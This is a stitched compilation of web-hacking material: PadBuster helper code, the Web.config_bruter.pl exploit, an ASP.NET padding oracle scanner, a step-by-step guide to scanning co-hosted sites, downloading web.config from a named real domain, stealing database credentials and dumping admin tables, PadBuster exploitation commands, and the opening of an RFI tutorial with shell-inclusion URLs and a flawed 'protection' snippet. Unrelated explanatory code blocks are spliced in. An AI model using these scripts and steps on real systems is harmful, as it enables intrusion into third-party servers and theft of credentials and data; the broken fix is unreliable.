# Format: 0=Base64, 1 Hex Lower, 2 Hex Upper, 3=NetUrlToken
my $returnVal = "";
if ($format == 1 || $format == 2) {
# HEX
if ($oper == 1) {
#Decode
#Always convert to lower when decoding)
$toEncodeDecode = lc($toEncodeDecode);
$returnVal = pack("H*",$toEncodeDecode);
} else {
#Encode
$returnVal = unpack("H*",$toEncodeDecode);
if ($format == 2) {
#Uppercase
$returnVal = uc($returnVal)
}
}
} elsif ($format == 3) {
# NetUrlToken
if ($oper == 1) {
$returnVal = &web64Decode($toEncodeDecode,1);
} else {
$returnVal = &web64Encode($toEncodeDecode,1);
}
} elsif ($format == 4) {
# Web64
if ($oper == 1) {
$returnVal = &web64Decode($toEncodeDecode,0);
} else {
$returnVal = &web64Encode($toEncodeDecode,0);
}
} else {
# B64
if ($oper == 1) {
$returnVal = &decode_base64($toEncodeDecode);
} else {
$returnVal = &encode_base64($toEncodeDecode);
$returnVal =~ s/(\r|\n)//g;
}
}
return $returnVal;
}
sub web64Encode {
my ($input, $net) = @_;
# net: 0=No Padding Number, 1=Padding (NetUrlToken)
$input = &encode_base64($input);
$input =~ s/(\r|\n)//g;
$input =~ s/\+/-/g;
$input =~ s/\//_/g;
my $count = $input =~ s/=//g;
$count = 0 if ($count eq "");
$input.=$count if ($net == 1);
return $input;
}
sub web64Decode {
my ($input, $net) = @_;
# net: 0=No Padding Number, 1=Padding (NetUrlToken)
$input =~ s/-/+/g;
$input =~ s/_/\//g;
if ($net == 1) {
my $count = chop($input);
$input = $input.("=" x int($count));
}
return &decode_base64($input);
}
sub promptUser {
my($prompt, $default, $yn) = @_;
my $defaultValue = $default ? "[$default]" : "";
print "$prompt $defaultValue: ";
chomp(my $input = <STDIN>);
$input = $input ? $input : $default;
if ($yn) {
if ($input =~ /^y|n|a$/) {
return $input;
} else {
&promptUser($prompt, $default, $yn);
}
} else {
if ($input =~ /^-?\d/ && $input > 0 && $input < 256) {
return $input;
} else {
&promptUser($prompt, $default);
}
}
}
sub writeFile {
my ($fileName, $fileContent) = @_;
if ($logFiles) {
if ($dirExists != 1) {
system($dirCmd." ".$dirName);
$dirExists = 1;
}
$fileName = $dirName.$dirSlash.$fileName;
open(my $OUTFILE, '>>', $fileName) or die "ERROR: Can't write to file $fileName\n";
print $OUTFILE $fileContent;
close($OUTFILE);
}
}
sub getTime {
my ($format) = @_;
my ($second, $minute, $hour, $day, $month, $year, $weekday, $dayofyear, $isDST) =
localtime(time);
my @months =
("JAN","FEB","MAR","APR","MAY","JUN","JUL","AUG","SEP","OCT","NOV","DEC");
my @days = ("SUN","MON","TUE","WED","THU","FRI","SAT");
$month=sprintf("%02d",$month);
$day=sprintf("%02d",$day);
$hour=sprintf("%02d",$hour);
$minute=sprintf("%02d",$minute);
$second=sprintf("%02d", $second);
$year =~ s/^.//;
if ($format eq "F") {
return $day.$months[$month].$year."-".( ($hour * 3600) + ($minute * 60) + ($second) );
} elsif ($format eq "S") {
return $months[$month]." ".$day.", 20".$year." at ".$hour.":".$minute.":".$second;
} else {
return $hour.":".$minute.":".$second;
}
}
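The mechanism PadBuster's processBlock relies on, and the design change that removes it, as an added example that is not part of the original document, of PadBuster, or of GDS: a service that answers differently on bad padding next to one that authenticates the ciphertext before decrypting. The block cipher is a constructed XOR stand-in, and the keys, IV and message are constructed, so it runs offline.

```python
"""CBC padding oracle: a leaky decrypt service beside an authenticated one."""
import hashlib
import hmac
import os

BLOCK = 16

def _pad_for(key: bytes) -> bytes:
    # Constructed stand-in for a block cipher: XOR with a key-derived 16-byte pad.
    # Not secure, but CBC chaining and PKCS#7 behave exactly as they would with AES.
    return hashlib.sha256(b"toy-block-cipher|" + key).digest()[:BLOCK]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(key: bytes, block: bytes) -> bytes:
    return xor(block, _pad_for(key))

block_decrypt = block_encrypt  # XOR is its own inverse

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt_padded(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

# Vulnerable design: a padding failure is distinguishable from every other outcome.
def leaky_service(key: bytes, iv: bytes, ct: bytes) -> str:
    try:
        pkcs7_unpad(cbc_decrypt_padded(key, iv, ct))
        return "ok"
    except ValueError:
        return "padding error"  # this distinct answer is the oracle

# Hardened design: encrypt-then-MAC, verify before decrypting, one uniform failure.
def seal(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
    iv = os.urandom(BLOCK)
    ct = cbc_encrypt(enc_key, iv, pkcs7_pad(plaintext))
    return iv + ct + hmac.new(mac_key, iv + ct, hashlib.sha256).digest()

def hardened_service(enc_key: bytes, mac_key: bytes, blob: bytes) -> str:
    iv, ct, tag = blob[:BLOCK], blob[BLOCK:-32], blob[-32:]
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    if len(ct) % BLOCK or not hmac.compare_digest(tag, expected):
        return "rejected"  # a tampered ciphertext never reaches the unpadder
    try:
        pkcs7_unpad(cbc_decrypt_padded(enc_key, iv, ct))
        return "ok"
    except ValueError:
        return "rejected"  # same answer as above, so nothing to distinguish

def recover_last_byte(query, prev_block: bytes, target_block: bytes):
    """One round of what PadBuster's processBlock repeats for every byte. query(fake_prev,
    target) is True when the service did NOT report a padding error. Returns the last
    plaintext byte of target_block, or None when every probe is answered alike."""
    for guess in range(256):
        fake = bytearray(BLOCK)
        fake[-1] = guess
        if not query(bytes(fake), target_block):
            continue
        # A hit may be accidental \x02\x02 (or longer) padding; a real \x01 hit must
        # survive a change to the second-to-last byte.
        fake[-2] ^= 0xFF
        if query(bytes(fake), target_block):
            intermediate = guess ^ 0x01           # D(target)[-1]
            return intermediate ^ prev_block[-1]  # P[-1] = D(target)[-1] ^ C_prev[-1]
    return None

def demo():
    enc_key, mac_key = b"k" * 16, b"m" * 16  # constructed keys
    iv = bytes(BLOCK)                         # constructed IV
    ct = cbc_encrypt(enc_key, iv, pkcs7_pad(b"YELLOW SUBMARINE; grant=admin"))

    def leaky(fake, target):
        return leaky_service(enc_key, fake, target) != "padding error"

    def hard(fake, target):  # the tag cannot be forged, so every probe fails alike
        return hardened_service(enc_key, mac_key, fake + target + bytes(32)) != "rejected"

    return (recover_last_byte(leaky, iv, ct[:BLOCK]),          # 0x45, 'E' of block 1
            recover_last_byte(leaky, ct[:BLOCK], ct[BLOCK:]),  # 0x03, pad byte of block 2
            recover_last_byte(hard, iv, ct[:BLOCK]))           # None, nothing leaks
```

The false-positive guard in recover_last_byte is the same problem PadBuster's falsePositiveDetector and autoRetry logic handle; the hardened service returns None because no probe is ever distinguishable.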
 Web.config_bruter.pl
#!/usr/bin/perl
#
#
# Webconfig Bruter - exploit tool for downloading Web.config
#
# To use this script you need PadBuster.
# PadBuster is a great tool and Brian Holyfield deserves all the credits.
#
#
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
#
use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
#Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;
my $testUrl = $ARGV[0]."?d=";
my $sampleBytes = $ARGV[1];
my $blockSize = $ARGV[2];
if ($#ARGV < 2) {
die "
Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize
Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to use.
This needs to come from PadBuster.
BlockSize = The block size being used by the algorithm (8 or 16)
Poc code by giorgio.fedon@mindedsecurity.com
Original Padbuster code from Brian Holyfield - Gotham Digital Science
Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd
d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16
";}
my $method = "GET";
$sampleBytes = encoder($sampleBytes, 1);
my $testBytes = "\x00" x $blockSize;
my $counter = 0;
# Use random bytes
my @nums = (0..255);
my $status = 1;
while ($status)
{
# Fuzz the test bytes
for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--)
{
substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
}
# Combine the test bytes and the sample
my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
chomp($combinedTestBytes);
$combinedTestBytes =~ s/%0A//g;
# Ok, now make the request
my ($status, $content, $location, $contentLength) =
makeRequest($method, $testUrl.$combinedTestBytes);
if ($status == "200")
{
# Remove this for "T" exploit
if (index($content,"parent.Sys.Application") == -1)
{
print $content."\n\n";
print "Total Requests:".$counter."\n\n";
print "Resulting Exploit Block:".$combinedTestBytes."\n\n";
last;
}
}
$counter++;
}
# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
#
# I also did the encoder / decoder, but your logic is definitely better
sub encoder
{
my ($toEncodeDecode, $oper) = @_;
# UrlDecoder Encoder
if ($oper == 1)
{
$toEncodeDecode =~ s/-/+/g;
$toEncodeDecode =~ s/_/\//g;
my $count = chop($toEncodeDecode);
$toEncodeDecode = $toEncodeDecode.("=" x int($count));
$returnVal = decode_base64($toEncodeDecode);
}
else
{
$b64Encoded = encode_base64($toEncodeDecode);
$b64Encoded =~ s/(\r|\n)//g;
$b64Encoded =~ s/\+/-/g;
$b64Encoded =~ s/\//_/g;
my $count = $b64Encoded =~ s/=//g;
($count eq "") ? ($count = 0) : "";
$returnVal = $b64Encoded.$count;
}
return $returnVal;
}
sub makeRequest {
my ($method, $url) = @_;
my ($lwp, $status, $content, $req, $location, $contentLength);
# Setup LWP UserAgent
$lwp = LWP::UserAgent->new(env_proxy => 1,
keep_alive => 1,
timeout => 30,
requests_redirectable => [],
);
$req = new HTTP::Request $method => $url;
my $response = $lwp->request($req);
# Extract the required attributes from the response
$status = substr($response->status_line, 0, 3);
$content = $response->content;
#print $content;
$location = $response->header("Location");
if ($location eq "")
{
$location = "N/A";
}
$contentLength = $response->header("Content-Length");
return ($status, $content, $location, $contentLength);
}
 AspNetPaddingOracleDetector.js [ JavaScript ]
/*
----------------------------------------
AspNetPaddingOracleDetector for ASP.NET
----------------------------------------
Duncan Smart, http://blog.dotsmart.net/
*/
if (!WScript.FullName.match(/cscript.exe$/i))
{
// Re-run in command prompt
new ActiveXObject("WScript.Shell").Run('cmd.exe /c cscript.exe //E:JScript //nologo "'+
WScript.ScriptFullName +'" & pause')
WScript.Quit(0);
}
var siteRoot;
if (WScript.Arguments.Unnamed.Count != 1) {
WScript.Echo("Enter site URL: ")
siteRoot = WScript.StdIn.ReadLine()
}
else {
siteRoot = WScript.Arguments.Unnamed.Item(0);
}
// Append root slash if neccessary
if (!siteRoot.match("/$"))
siteRoot += "/";
WScript.Echo("Testing site: " + siteRoot);
//TODO: add more tests for other padding oracles
var response1 = httpGet(siteRoot + "webresource.axd?aspxerrorpath=bar");
var response2 = httpGet(siteRoot + "webresource.axd?d=foo&aspxerrorpath=bar");
// Compare HTTP statuses
if (response1.status != response2.status)
{
WScript.Echo("MIGHT BE VULNERABLE: HTTP status mismatch");
WScript.Echo("\r\n=== Response 1 ===");
WScript.Echo(response1.status);
WScript.Echo("\r\n=== Response 2 ===");
WScript.Echo(response2.status);
WScript.Quit(1);
}
// Compare headers
if (response1.headers != response2.headers)
{
WScript.Echo("MIGHT BE VULNERABLE: HTTP headers mismatch");
WScript.Echo("\r\n=== Response 1 ===");
WScript.Echo(response1.headers);
WScript.Echo("\r\n=== Response 2 ===");
WScript.Echo(response2.headers);
WScript.Quit(1);
}
// Compare HTML
if (response1.body != response2.body)
{
WScript.Echo("MIGHT BE VULNERABLE: HTTP body mismatch");
WScript.Echo("=== Response 1 ===");
WScript.Echo(response1.body);
WScript.Echo("");
WScript.Echo("=== Response 2 ===");
WScript.Echo(response2.body);
WScript.Quit(1);
}
WScript.Echo("Site might be OK: WebResource.axd is not acting as a padding oracle");
WScript.Quit(0);
// ====== Utilities ======
function httpGet(url)
{
var http = new ActiveXObject("Microsoft.XMLHTTP");
http.open("GET", url, /*async*/ false);
try {
http.send();
}
catch (err) {
return {'status':null, 'headers':null, 'body':null};
}
var headers = http.getAllResponseHeaders().split(/\r\n/);
// Remove "Date" header as that will likely be different!
headers = filter(headers, function(h){ return !h.match("^Date:") });
return {
status: http.status + " " + http.statusText,
headers: headers.join("\r\n"),
body: http.responseText
};
}
// Filters array to items that satisfy 'where' function
function filter(array, where){
var newArray = [];
for (var i = 0; i < array.length; i++) {
if (where(array[i]))
newArray.push(array[i]);
}
return newArray;
}
 ListSite.txt [ A blank file in which you write the website names, one per line ]
 CheckPaddingOracle.bat [ A batch program for checking oracle vulnerability ]
@echo off
setLocal EnableDelayedExpansion
for /f "tokens=* delims= " %%a in (ListSite.txt) do (
cscript //nologo AspNetPaddingOracleDetector.js %%a
echo.
)
cmd
How To :
 Go to any ASP.NET related website. Do a reverse IP domain check and find the server and
the other sites hosted on it.
 Copy all sites to Notepad and name the file -: ListSite.txt
 Run -: CheckPaddingOracle.bat. The script will check each website from the list for the vulnerability.
 Open the vulnerable site and check its source code for:
/WebResource.axd?d=
/ScriptResource.axd?d=
 Scenario I: Extract PaddingOracle.rar; it has a folder that contains all the scripts: exe.bat,
padBuster.pl, web.config_Bruter.pl. Now,
 Open -: exe.bat and run padBuster.pl
 Command -: ..perl.exe padBuster.pl http://madeinvietnam.net/WebResource.axd?d=2uT3s0_S0xTW7_RW6mW1q2 2uT3s0_S0xTW7_RW6mW1q2 16 -encoding 3 -plaintext "|||~/web.config"
 Choose ID - 2
 Now you have the Encrypted Value -: T-2QM86TZAAAAAAAAAAAAAAAAAAAAAA1
 Now again construct a command like -:
..perl.exe Web.Config_Bruter.pl http://madeinvietnam.net/ScriptResource.axd -2QM86TZAAAAAAAAAAAAAAAAAAAAAA1
 Copy this command to exe.bat and run it.
 You will get the Resulting Exploit Block : gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0
 Create a link -: http://madeinvietnam.net/ScriptResource.axd?d=gp05c15oqh4u3vIbDhFNU_tkD-GMAAAAAA0
 Open it in your web browser.
 You will find one XML document now.
 Find the keyword -: connection
 In that line you will get the Source address, User ID and Password.
 Now open MS SQL and connect to the database.
 Now the whole database is dumped to your PC, or you can say I am connected to their database;
now find the admin tables and columns and open them up.
 You can simply right click on the admin table > and select top 1000 rows.
 OK, you have got your admin and its password now.
 If the password is not encrypted then fine, but, as in our case, if the password is encrypted then you
have to intercept the password through Burp Suite, OR if you can decrypt the password,
that's awesome...
 Open -: Burp Suite > proxy > intercept on
PADBUSTER V0.3 AND THE .NET PADDING ORACLE ATTACK
Now that a weekend has passed since the .NET patch was released, and since there
is already a working public example of how to reliably download a web.config
using the padding oracle attack, we have decided to finally release v0.3 of
PadBuster with the "Brute Force" option. This option is specifically designed to
handle scenarios where the first block of ciphertext cannot be crafted using CBC-R
due to a secret IV. This feature was NOT designed specifically for the .NET attack,
as our intention for PadBuster is to be a universal tool for identifying and
exploiting padding oracles in any web application. That being said, the brute force
option CAN be used to reliably perform a web.config download attack within a
reasonable number of requests.
Before discussing how to perform this attack using PadBuster, and some of the
other new features in this version, it's worth noting that there are more efficient
ways to perform the web.config download attack using ScriptResource.axd. The T-
Block brute force attack vector, which was originally pointed out to me by James
Martin of ESP Technologies and is also discussed here by Giorgio Fedon of
Minded Security, is significantly faster and more efficient. This technique,
however, is pretty specific to the .NET ScriptResource.axd attack and as such is
not likely to be incorporated into PadBuster (a separate exploit script is probably
warranted).
The web.config attack using PadBuster is essentially a three step process. I will
assume that the reader is already familiar with the specifics of why the script
resource handler is vulnerable to a file download attack. If you are not familiar
with the underlying issue, you can read about it here, here and here.
Step 1: Encrypt the Payload using CBC-R
The first step of the attack is to identify a component that is vulnerable to the
padding oracle attack and use it to encrypt the web.config payload
(|||~/web.config). This can typically be done in a few ways:
1 - Using WebResource.axd as a padding oracle for CBC-R.
If CustomErrors are NOT enabled, then you don't even need a valid ciphertext
sample to exploit the oracle...you can use an encoded dummy value of all NULLS
instead (AAAAAAAAAAAAAAAAAAAAAA2).
padBuster.pl http://www.myapp.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAAAA2 AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config"
If CustomErrors ARE enabled, you can still use WebResource.axd as the oracle.
The caveat, however, is that you'll need to use a valid ciphertext query string
sample and use the -prefix option so that PadBuster sends this sample as the prefix
of each test request.
padBuster.pl http://www.myapp.com/WebResource.axd?d=1s45vAJre3GVd98iQoAjgQ2 1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config" -prefix 1s45vAJre3GVd98iQoAjgQ2
2 - Using ScriptResource.axd as a padding oracle for CBC-R.
Like with the web resource handler, this is pretty straightforward if CustomErrors
are not enabled:
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=1s45vAJre3GVd98iQoAjgQ2 1s45vAJre3GVd98iQoAjgQ2 16 -encoding 3 -plaintext "|||~/web.config"
If CustomErrors ARE enabled, this handler can also be used as a padding oracle.
The interesting thing about this technique is that it seems to work despite
implementing all of the workarounds that Microsoft recommended before the patch
was issued (CustomErrors using RedirectMode and optional Sleep). This
technique, however, requires use of the brute force option so I'll come back to that
in a bit.
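The "d" values in these commands, and the -encoding 3 switch, use the .NET URL-token flavour of base64 that the Perl encoder() in Web.config_bruter.pl above also implements: '+' becomes '-', '/' becomes '_', the '=' padding is stripped and its count is appended as a final digit. The following is an added Node.js example (my own code, not from the page, PadBuster or Web.config_bruter.pl; function names are mine) that decodes and re-encodes such tokens and splits the result into 16-byte blocks, which is the first sanity check worth running on any value before treating it as CBC ciphertext.

```javascript
// Added example: .NET URL-token encoding (PadBuster "-encoding 3").
// Layout: standard base64, '+' -> '-', '/' -> '_', trailing '=' removed and
// the number of removed '=' characters (0, 1 or 2) appended as one digit.

// Decode a token such as "1s45vAJre3GVd98iQoAjgQ2" back to its raw bytes.
// Malformed tokens throw instead of silently decoding to garbage.
function decodeUrlToken(token) {
  if (typeof token !== 'string' || token.length < 2) {
    throw new Error('token too short');
  }
  const padCount = Number(token.slice(-1));          // trailing digit = number of '='
  if (!Number.isInteger(padCount) || padCount < 0 || padCount > 2) {
    throw new Error('invalid padding count digit');
  }
  const body = token.slice(0, -1);
  if (!/^[A-Za-z0-9_-]*$/.test(body)) {
    throw new Error('invalid character in token body');
  }
  const b64 = body.replace(/-/g, '+').replace(/_/g, '/') + '='.repeat(padCount);
  if (b64.length % 4 !== 0) {
    throw new Error('token length does not match its padding digit');
  }
  return Buffer.from(b64, 'base64');
}

// Encode raw bytes into the same token form (inverse of decodeUrlToken).
function encodeUrlToken(bytes) {
  const b64 = Buffer.from(bytes).toString('base64');
  const stripped = b64.replace(/=+$/, '');
  const padCount = b64.length - stripped.length;
  return stripped.replace(/\+/g, '-').replace(/\//g, '_') + String(padCount);
}

// Split decoded ciphertext into cipher blocks (16 bytes for AES, the block size
// every PadBuster command on this page passes). A length that is not a whole
// number of blocks cannot be CBC ciphertext for that cipher.
function splitBlocks(bytes, blockSize = 16) {
  if (bytes.length === 0 || bytes.length % blockSize !== 0) {
    throw new Error(`length ${bytes.length} is not a multiple of ${blockSize}`);
  }
  const blocks = [];
  for (let i = 0; i < bytes.length; i += blockSize) {
    blocks.push(bytes.subarray(i, i + blockSize));
  }
  return blocks;
}

// Constructed demonstration: the all-NULL dummy sample from Step 1 is one
// 16-byte block of zeros, and the WebResource.axd sample quoted above decodes
// to a single 16-byte block as well.
function demo() {
  const dummy = encodeUrlToken(Buffer.alloc(16));          // "AAAAAAAAAAAAAAAAAAAAAA2"
  const sample = decodeUrlToken('1s45vAJre3GVd98iQoAjgQ2'); // sample from the page
  return { dummy, sampleBlocks: splitBlocks(sample).length };
}

console.log(demo());
```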
Step 2: Verify the encrypted payload does NOT include pipes
This step is optional, but certainly worth performing to ensure that you aren't
headed down a dead end road. In order for the exploit to work, the payload you
send to the handler (including the "garbage" IV block) CANNOT include any pipe
characters. If it does, the payload will never work. To verify this, you can use the
padding oracle to decrypt your payload and verify its contents. So assuming that
Step 1 produced a payload value of
"iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1", then the
following command would be used to verify the contents of the payload. Make
sure to use the -noiv option as the first block is the one you are most interested in.
padBuster.pl http://www.myapp.com/WebResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -noiv
So what if your payload DOES include pipes? Not to fear, there's an easy
workaround for this too. You may have noticed that when you decrypt samples
using PadBuster, it prints the HEX encoded Ciphertext Bytes and Intermediate
Bytes with the results of each block. You can optionally use any of these pairs
along with the -ciphertext and -intermediate switches to feed PadBuster a known
pair of ciphertext/intermediate values for use during CBC-R encryption. Using any
one of these pairs to encrypt your exploit payload should produce a different
payload than would otherwise be generated by PadBuster on its own, which can
then be verified to ensure that it does not contain pipes.
Step 3: Brute force the first block
Now that you have a valid payload, the final step is to obtain the first block that
will trigger the file download logic. The reason this step is tricky is that the
Framework typically does not pass an IV along with the ciphertext. As such, we
can't use the padding oracle to reliably produce our desired first block.
The good news is that since you only need the first two bytes of the decrypted
value to trigger our exploit (either Q#, q#, R# or r#) you can essentially brute force
the needed block with fairly reliable success. And the even better news is that
you’d be surprised at how quick it is to blindly brute force one of these values.
The approach taken by PadBuster is similar, but slightly different, than the
approach used by the Web.config Bruter script released by Giorgio Fedon. I must
again credit James Martin for originally sharing his proof of concept exploit code
with me that leveraged this technique for identifying the first block. Instead of
random block values, however, PadBuster performs a sequential brute force
starting with all NULLS. The sequential brute force ensures that you never attempt
the same block value more than once and also allows you to resume the brute force
where you left off if the script gets killed (using the -resume option). The example
shown below assumes the payload from our Step 2 example above:
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -bruteforce -log
PadBuster's brute force mode works similar to the other modes of PadBuster,
where the first step is an automated response analysis. The main difference is that
rather than identifying a padding error, you want to identify an error that indicates
failure of the brute force attempt rather than success. In most cases, you may have
only one response to choose from...which is totally fine (unless one of the initial
256 fuzzing attempts produces a different response). In the case of
ScriptResource.axd, there’s a good chance you'll have more than one as shown
below.
INFO: Starting PadBuster Brute Force Mode
[+] Starting response analysis...
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 337 N/A
2 ** 255 404 1524 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended :
The reason for the 200 response included above is the T-Block. For our purposes,
we are not using the T-Block so we can select signature #2 (the 404). PadBuster
will continue issuing brute force attempts and notify you of every response that
does not match this signature. You'll likely get several T-Block hits similar to the
200 response shown above before you hit a block that returns the web.config as
shown below (this is just an excerpt from the output).
Attempt 4275 - Status: 200 - Content Length: 367
http://www.myapp.com/ScriptResource.axd?d=igA4AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0
Attempt 4561 - Status: 200 - Content Length: 360
http://www.myapp.com/ScriptResource.axd?d=4AA4AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0
Attempt 4792 - Status: 200 - Content Length: 100277
http://www.myapp.com/ScriptResource.axd?d=xwA5AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0
Attempt 5353 - Status: 200 - Content Length: 359
http://www.myapp.com/ScriptResource.axd?d=BAA6AAAAAAAAAAAAAAAAAA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0
As you can imagine, it’s difficult to tell whether these responses contain anything
meaningful based solely on the data that is printed to the screen. In the case of this
exploit, we know that the web.config file is likely going to be much larger than the
small T-Block responses which average around 500 Bytes. You can actually see
that in the excerpt above, attempt number 4792 shows a much larger content
length...this is the response that contains the web.config file. The inclusion of
unwanted T-Block responses in our output is a result of our desire to maintain
PadBuster as a universal tool that is not specific to a particular vulnerability such
as this one.
You may also have noticed that our original command made use of another new
option (-log). The "log" option tells PadBuster to log various output files in an
automatically generated folder using the PadBuster.DDMMYY-TIME naming
convention. This option is critical for use in brute force mode, since each matching
response is logged to this folder and can be easily reviewed to determine whether
the brute force attempt worked. For the case of a web.config download exploit, I
recommend running the above command and monitoring the output folder to
determine when a significantly larger response file gets created.
Bypassing the Workarounds
Now that you've seen how to retrieve the web.config, let’s go back to an alternate
technique for using ScriptResource.axd as a padding oracle. As I mentioned
previously, this technique works despite implementing the recommended
workarounds initially presented by Microsoft in their guidance preceding the patch
release. To start, you'll need a valid ciphertext sample. The sample, however, does
not have to be valid for the script resource handler (it can be taken from any
Framework component...most easily from the WebResource.axd query string).
Step 1: Find a valid T-Block Request
Using the obtained sample, along with the -bruteforce option, the following
command can be used to quickly brute force a valid T-Block. The following
example assumes that we were able to obtain a valid "d" value from a link to the
web resource handler
(/WebResource.axd?d=qmZbysenet6VGS94Ord8gQ2&t=633768217780468750).
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2 qmZbysenet6VGS94Ord8gQ2 16 -encoding 3 -bruteforce
Once you run PadBuster with these options, and select the default error pattern,
you should get a 200 response within the first few hundred requests similar to the
one shown below:
Attempt 60 - Status: 200 - Content Length: 337
http://www.myapp.com/ScriptResource.axd?d=OwAAAAAAAAAAAAAAAAAAAKpmW8rHp3relRkveDq3fIE1
Step 2: Use the obtained T-Block with the -prefix option
Now you can leverage the obtained T-Block request, along with the -prefix option,
to use the script resource handler as a padding oracle as shown below.
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2 qmZbysenet6VGS94Ord8gQ2 16 -encoding 3 -noiv -prefix OwAAAAAAAAAAAAAAAAAAAKpmW8rHp3relRkveDq3fIE1
The examples above hopefully demonstrate how to use the new features of
PadBuster for performing various exploits against the .NET framework. Our plan
is to add more features to PadBuster where they make sense, specifically features
that can be useful against a wide variety of padding oracle attack vectors. As
always, send us your feedback, modifications, bug reports, or general comments so
that we can incorporate them into future versions.
Web-servers & Application Hacking

Web-servers & Application Hacking

  • 1.
  • 2.
    Part 1 Web-hacking Attacks Thisis a tutorial about web-hacking methods that I and many other hackers have collected. I thought that many people would learn a lot from this here. Guide content :  Remote file inclusion  Localfile inclusion  LFI 2 RCE  LFI 2 RCE Using Firefox  Localfile download  Full path disclosure  CommandInjectionVulnerability Exploit  SQL Injection - with load file  MSSQLInjection  Blind SQL Injection  Postgre SQLInjection  Error based Postgre SQLInjection  SQL Injection on ASPX  Dot net nuke  XSS  CRLF  CSRF  Server Side Includes | Server Side Inclusion  Symlink Attack  Sql injection String & Union based  Xpath Injection  LDAP Injection  DNS Zone TransferVulnerability Exploit  Oracle Padding Attack Using Brup Suite
  • 3.
    So let’s getstarted ! Remote file inclusion : 1) RFI RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses functions include () to include some files for a GET method. This file is usually in txt format pages whose content is printed. Example: Code: http://www.site.com/index.php?page=home Now a days RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt format. 2) Vulnerable script Code: <?php $page = $_GET['page']; include($page); ?> 3) Exploiting vulnerability We have site: Code: http://www.site.com/index.php?page=home Now instead of home we gonna use our shell. So we get: Code: http://www.site.com/index.php?page=www.shell-link.com/shell.txt? If site is vulnerable it should show shell with list of files from site you are attacking. 4) Null byte bypass In some scripts there is a weak protection which is gonna include file and add html extension, or some other: Code: <?php $page = $_GET['page']; include($page.".html"); ?> In that case we are going to use null byte bypass(%00). Everything after %00 would not count and use. We are also using %00 for picture upload bypass as php, but I am not going to talk about it.
  • 4.
    So link shouldlook like this: Code: http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00 5) Protection script Script should look like this: Code: <?php $page = $_GET['page']; include($page); ?> So we are going to add some stuff to protect it: Code: <?php $page = $_GET['page']; if(file_exists("pages/".$page) { include($page); } ?>
  • 5.
